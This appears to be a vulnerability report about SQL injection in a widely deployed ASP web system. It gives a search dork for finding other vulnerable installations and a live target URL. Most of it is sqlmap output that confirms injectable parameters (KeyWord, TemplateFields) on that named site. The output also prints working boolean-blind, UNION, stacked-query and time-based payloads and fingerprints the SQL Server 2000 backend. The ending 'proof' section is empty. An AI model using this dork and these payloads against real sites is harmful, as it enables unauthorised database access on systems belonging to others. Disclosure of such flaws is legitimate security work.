### Brief description:
SQL injection
### Detailed description:
This system is very widely deployed.
Search keyword: inurl:ws2004/Model/
```
http://www.fzjcxx.cn/ws2004/Model/default.asp?KeyWord=1&TemplateFunctionMode=32&TemplateFields=1&SearchType=0
```
```
[22:27:15] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output directory
[22:27:16] [INFO] testing connection to the target URL
[22:27:16] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:27:17] [INFO] target URL is stable
[22:27:17] [INFO] testing if GET parameter 'KeyWord' is dynamic
[22:27:17] [INFO] confirming that GET parameter 'KeyWord' is dynamic
[22:27:17] [INFO] GET parameter 'KeyWord' is dynamic
[22:27:17] [WARNING] heuristic (basic) test shows that GET parameter 'KeyWord' might not be injectable
[22:27:17] [INFO] testing for SQL injection on GET parameter 'KeyWord'
[22:27:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:27:19] [INFO] GET parameter 'KeyWord' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:27:20] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] y
[22:27:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:27:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:27:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:27:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:27:49] [INFO] testing 'MySQL inline queries'
[22:27:49] [INFO] testing 'PostgreSQL inline queries'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:27:49] [INFO] testing 'Oracle inline queries'
[22:27:49] [INFO] testing 'SQLite inline queries'
[22:27:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:27:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:27:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:28:50] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:28:50] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:28:51] [INFO] GET parameter 'KeyWord' seems to be 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable
[22:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[22:28:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:28:51] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[22:28:52] [INFO] target URL appears to have 2 columns in query
[22:28:52] [WARNING] reflective value(s) found and filtering out
[22:28:52] [WARNING] output with limited number of rows detected. Switching to partial mode
[22:28:52] [INFO] GET parameter 'KeyWord' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'KeyWord' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[22:29:03] [INFO] testing if GET parameter 'TemplateFunctionMode' is dynamic
[22:29:03] [INFO] confirming that GET parameter 'TemplateFunctionMode' is dynamic
[22:29:03] [INFO] GET parameter 'TemplateFunctionMode' is dynamic
[22:29:04] [WARNING] heuristic (basic) test shows that GET parameter 'TemplateFunctionMode' might not be injectable
[22:29:04] [INFO] testing for SQL injection on GET parameter 'TemplateFunctionMode'
[22:29:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:29:05] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[22:29:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[22:29:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:29:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:29:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:29:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:29:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:29:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:29:43] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:29:43] [INFO] testing 'MySQL inline queries'
[22:29:44] [INFO] testing 'PostgreSQL inline queries'
[22:29:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:29:44] [INFO] testing 'Oracle inline queries'
[22:29:44] [INFO] testing 'SQLite inline queries'
[22:29:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:29:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:29:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:29:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:29:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:29:47] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:29:48] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:29:49] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:29:49] [INFO] testing 'Oracle AND time-based blind'
[22:29:50] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:29:51] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:29:51] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[22:29:55] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)
[22:29:57] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns'
[22:29:59] [WARNING] GET parameter 'TemplateFunctionMode' is not injectable
[22:29:59] [INFO] testing if GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] confirming that GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] GET parameter 'TemplateFields' is dynamic
[22:30:00] [INFO] heuristic (basic) test shows that GET parameter 'TemplateFields' might be injectable
[22:30:00] [INFO] testing for SQL injection on GET parameter 'TemplateFields'
[22:30:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:30:02] [INFO] GET parameter 'TemplateFields' seems to be 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)' injectable
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:30:02] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:30:03] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:30:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:30:05] [INFO] testing 'Generic UNION query (43) - 1 to 20 columns'
[22:30:05] [INFO] checking if the injection point on GET parameter 'TemplateFields' is a false positive
GET parameter 'TemplateFields' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[22:30:07] [INFO] testing if GET parameter 'SearchType' is dynamic
[22:30:08] [WARNING] GET parameter 'SearchType' does not appear dynamic
[22:30:08] [WARNING] heuristic (basic) test shows that GET parameter 'SearchType' might not be injectable
[22:30:08] [INFO] testing for SQL injection on GET parameter 'SearchType'
[22:30:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[22:30:09] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[22:30:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[22:30:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:30:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[22:30:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[22:30:14] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[22:30:15] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'
[22:30:16] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[22:30:16] [INFO] testing 'MySQL inline queries'
[22:30:17] [INFO] testing 'PostgreSQL inline queries'
[22:30:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[22:30:17] [INFO] testing 'Oracle inline queries'
[22:30:17] [INFO] testing 'SQLite inline queries'
[22:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:30:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[22:30:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[22:30:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:30:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[22:30:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[22:30:21] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)'
[22:30:22] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)'
[22:30:22] [INFO] testing 'Oracle AND time-based blind'
[22:30:23] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses'
[22:30:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)'
[22:30:24] [INFO] testing 'MySQL UNION query (43) - 1 to 10 columns'
[22:30:27] [INFO] testing 'Generic UNION query (43) - 1 to 10 columns'
[22:30:29] [WARNING] GET parameter 'SearchType' is not injectable
sqlmap identified the following injection points with a total of 483 HTTP(s) requests:
---
Place: GET
Parameter: KeyWord
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: KeyWord=1' AND 8355=8355 AND 'pMth'='pMth&TemplateFunctionMode=32&TemplateFields=1&SearchType=0

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: KeyWord=1' UNION ALL SELECT NULL,CHAR(113)+CHAR(121)+CHAR(120)+CHAR(120)+CHAR(113)+CHAR(84)+CHAR(115)+CHAR(100)+CHAR(109)+CHAR(90)+CHAR(83)+CHAR(99)+CHAR(77)+CHAR(122)+CHAR(71)+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)-- &TemplateFunctionMode=32&TemplateFields=1&SearchType=0

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: KeyWord=1'; WAITFOR DELAY '0:0:5'--&TemplateFunctionMode=32&TemplateFields=1&SearchType=0

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: KeyWord=1' AND 7937=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'MUme'='MUme&TemplateFunctionMode=32&TemplateFields=1&SearchType=0

Place: GET
Parameter: TemplateFields
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: KeyWord=1&TemplateFunctionMode=32&TemplateFields=(SELECT (CASE WHEN (6562=6562) THEN 1 ELSE 6562*(SELECT 6562 FROM master..sysdatabases) END))&SearchType=0
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: KeyWord, type: Single quoted string (default)
[1] place: GET, parameter: TemplateFields, type: Unescaped numeric
[q] Quit
>
[22:30:32] [INFO] testing Microsoft SQL Server
[22:30:32] [INFO] confirming Microsoft SQL Server
[22:30:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[22:30:32] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.fzjcxx.cn'
[*] shutting down at 22:30:32
```
### Proof of vulnerability: